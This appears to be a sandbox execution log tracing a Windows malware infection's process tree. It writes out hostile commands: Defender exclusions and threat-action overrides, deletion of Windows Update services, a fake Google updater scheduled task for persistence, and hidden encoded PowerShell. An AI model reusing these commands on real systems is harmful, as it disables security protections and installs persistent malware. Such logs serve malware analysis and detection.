C:\Users\Admin\Pictures\le4XVNTwlsCFT1vSYV9qZfgQ.exe"C:\Users\Admin\Pictures\le4XVNTwlsCFT1vSYV9qZfgQ.exe"5⤵PID:2104
-
-
C:\Users\Admin\Pictures\iv6t0TaUQ3P23n2ZZ4xgHtqt.exe"C:\Users\Admin\Pictures\iv6t0TaUQ3P23n2ZZ4xgHtqt.exe"5⤵PID:4536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 2286⤵
- Program crash
PID:4196
-
-
-
C:\Users\Admin\Pictures\5OOy4aNueB5QpC3S0HgRtZvH.exe"C:\Users\Admin\Pictures\5OOy4aNueB5QpC3S0HgRtZvH.exe"5⤵
- Looks for VMWare services registry key.
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:6020
-
-
C:\Users\Admin\Pictures\uLBknOhgdGBcPr4C2VIutNtS.exe"C:\Users\Admin\Pictures\uLBknOhgdGBcPr4C2VIutNtS.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==5⤵
- Looks for VMWare services registry key.
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:4128
-
-
C:\Users\Admin\Pictures\nC3QXV6hbtSKDWLelvGt5PmU.exe"C:\Users\Admin\Pictures\nC3QXV6hbtSKDWLelvGt5PmU.exe"5⤵PID:2188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 7606⤵
- Program crash
PID:956
-
-
-
C:\Users\Admin\Pictures\ls0uPFdYZj1I88hK7WfRz2aW.exe"C:\Users\Admin\Pictures\ls0uPFdYZj1I88hK7WfRz2aW.exe" --silent --allusers=05⤵
- Loads dropped DLL
PID:3120 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 5046⤵
- Program crash
PID:5392
-
-
-
C:\Users\Admin\Pictures\4mcbZTtdFuPL79KiADBDoIeo.exe"C:\Users\Admin\Pictures\4mcbZTtdFuPL79KiADBDoIeo.exe"5⤵PID:5532
-
-
C:\Users\Admin\Pictures\KvvRqBbNqfutOD0HhIV3A0C4.exe"C:\Users\Admin\Pictures\KvvRqBbNqfutOD0HhIV3A0C4.exe"5⤵PID:2596
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2596 -s 2926⤵
- Program crash
PID:5364
-
-
-
C:\Users\Admin\Pictures\DpJ873NtgAlrFVbXX7h6FnM9.exe"C:\Users\Admin\Pictures\DpJ873NtgAlrFVbXX7h6FnM9.exe"5⤵
- Looks for VMWare services registry key.
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:1072
-
-
C:\Users\Admin\Pictures\7jJH3p4AmVKOrGbnbQaWPW9f.exe"C:\Users\Admin\Pictures\7jJH3p4AmVKOrGbnbQaWPW9f.exe"5⤵PID:4632
-
-
C:\Users\Admin\Pictures\qI7aPgVljoENRNVrUTEUh6Bq.exe"C:\Users\Admin\Pictures\qI7aPgVljoENRNVrUTEUh6Bq.exe"5⤵
- Looks for VMWare services registry key.
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:4448
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 12523⤵
- Program crash
PID:5364
-
-
C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe"C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3748
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3412
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4548
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2160
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4828
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2280
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3440
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1848
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3888
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3928
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4540
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:688
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:2584
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:3076
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:2948
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#extmbyk#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:4044
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5084
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2792
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe pxpxvzslvmqtfph2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:392
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵PID:2016
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
PID:2772
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1696
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe jgqccdbbxrzbdlfm 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZe7ZXiwOLhA74FQzXCOhDuCEgX6WVRJena9L8fAOb/OCpbdBtftU9QMBxG8aHan0UHttTlDXmg8zTJWEzz1jyzM08ycWZiYcc5uJhds9Rh8+fDvfznlHAMreIYNxYX5k9xJHAc4B0ozcm5wxfAVR1NkkPB2hskLA90oq6EEwunLM+cHugrCZPmAL+xjChc1L0WUYPKljZ7G2hVhhzqEtgfjve5jiLrrwjfPxGeeAf9vve0gqrSPFO0K58xxNJ8ClGMYA3jdfqtywTWLARpI3q8mmFmhW90pU5VNfoa01PrEPOLs5r8ABfO582XBZtlugNpAIuxABxOKWLf8XQtXZvoQ7dHNPMO3GgNUOP3U0XxrRiFOF/vB7jsNiVJkb1bI5v5nt59vi2Czwj87T9ujtAUxaRW+5V3BDnzrgkctEMZcXBV724S22jgwV6IzKvy6UKGJnVaM3eKyvceEhYeYhPyF7ZZaH7hc6eH/4/zT7gy/FOEOKoQlj9wOdYItup8djwg3zNzf9whNSzJ/f9PwHpnsQ==2⤵PID:1552
-
-
C:\Users\Admin\AppData\Local\Temp\16FC.exeC:\Users\Admin\AppData\Local\Temp\16FC.exe2⤵PID:4764
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe3⤵
- Modifies firewall policy service
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:1908 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1908 -s 11244⤵
- Program crash
PID:1404
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4008
-
-
-
C:\Users\Admin\AppData\Local\Temp\2238.exeC:\Users\Admin\AppData\Local\Temp\2238.exe2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5112 -
C:\Users\Admin\AppData\Local\Temp\WindowsUpdater.exe"C:\Users\Admin\AppData\Local\Temp\WindowsUpdater.exe"3⤵PID:3828
-
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4344 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:884
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4836 -ip 48361⤵PID:4404
-
C:\Windows\SysWOW64\Ghxyq.exeC:\Windows\SysWOW64\Ghxyq.exe -auto1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\SysWOW64\Ghxyq.exeC:\Windows\SysWOW64\Ghxyq.exe -acsi2⤵
- Executes dropped EXE
- Enumerates connected drives
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3888
-
-
C:\Windows\System32\sc.exesc stop UsoSvc1⤵
- Launches sc.exe
PID:408
-
C:\Windows\System32\sc.exesc stop bits1⤵
- Launches sc.exe
PID:1624
-
C:\Windows\System32\sc.exesc stop wuauserv1⤵
- Launches sc.exe
PID:1832
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f1⤵PID:4196
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f1⤵PID:4436
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f1⤵PID:2100
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 01⤵PID:4440
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 01⤵PID:1076
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f1⤵PID:4828
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 01⤵PID:1928
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 01⤵PID:4060
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f1⤵PID:2428
-
C:\Windows\System32\sc.exesc stop dosvc1⤵
- Launches sc.exe
PID:5004
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc1⤵
- Launches sc.exe
PID:1916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3104 -ip 31041⤵PID:1784
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4768 -ip 47681⤵PID:4732
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 4148 -ip 41481⤵PID:4048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABTAHQAcgBpAG4AZwBJAGQAcwAuAGUAeABlADsA1⤵PID:4260
-
C:\Users\Admin\AppData\Local\Detail\ekenek\StringIds.exeC:\Users\Admin\AppData\Local\Detail\ekenek\StringIds.exe1⤵PID:4652
-
C:\Users\Admin\AppData\Local\Detail\ekenek\StringIds.exeC:\Users\Admin\AppData\Local\Detail\ekenek\StringIds.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4664 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe3⤵
- Suspicious use of SetThreadContext
PID:4848 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵
- Looks for VMWare services registry key.
- Maps connected drives based on registry
PID:1284
-
-
-
-
C:\Users\Admin\AppData\Roaming\TypeId\Tags.exeC:\Users\Admin\AppData\Roaming\TypeId\Tags.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:4736 -
C:\Users\Admin\AppData\Roaming\TypeId\Tags.exeC:\Users\Admin\AppData\Roaming\TypeId\Tags.exe2⤵
- Suspicious use of SetThreadContext
PID:5980 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe3⤵
- Suspicious use of SetThreadContext
PID:5896 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe4⤵PID:2944
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2776 -ip 27761⤵PID:5368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1908 -ip 19081⤵PID:5472
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:5152
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5784
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4544 -ip 45441⤵PID:5136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3844 -ip 38441⤵PID:3964
-
C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\BbAXLjX.exeC:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\BbAXLjX.exe Ik /AZsite_idLOu 385118 /S1⤵
- Drops file in System32 directory
PID:2604 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:5448
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:6068
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5924
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:5820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:6100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:5876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:6004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:5300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5348
-
-
